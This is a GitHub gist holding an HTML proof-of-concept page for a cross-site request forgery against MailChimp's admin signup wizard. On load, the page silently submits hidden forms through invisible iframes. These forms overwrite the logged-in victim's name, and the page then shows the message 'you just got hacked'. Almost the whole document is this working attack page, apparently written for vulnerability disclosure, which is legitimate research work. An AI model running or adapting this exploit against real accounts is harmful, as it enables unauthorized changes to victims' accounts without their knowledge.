Skip to content

Instantly share code, notes, and snippets.

@YasserGersy
Last active August 30, 2016 04:39
Show Gist options
  • Save YasserGersy/16f7fddb3ec10e2269d443432d582476 to your computer and use it in GitHub Desktop.
Save YasserGersy/16f7fddb3ec10e2269d443432d582476 to your computer and use it in GitHub Desktop.
<!DOCTYPE html><html><head>
<title> MailChimp CSRF Proof Of Concept</title>
<script type="text/javascript">
var t='0';
function exec(){if (t!='1') exec1(); }
function exec1() { document.getElementById('form1').submit();
setTimeout(exec2, 3000);}
function exec2(){
document.getElementById('form2').submit();
document.getElementById('r3').innerText='you just got hacked , i have changed your info';t='1';
}
window.onbeforeunload=function(){
return "please wait";
}
</script>
</head><body>
<h3> Dear User </h3><h4><div id='r3'> Congrats! </div> </h4>
<body onload="exec();" >
<form id="form1" target="if1" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="flname" />
<input type="hidden" name="fname" value="youarehacked" />
<input type="hidden" name="lname" value="xGersy" />
<input type="hidden" name="x" value="x" />
</form>
<form id="form2" target="if2" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="finish" />
</form>
<iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0" ></iframe>
<iframe name="if2" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>
</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment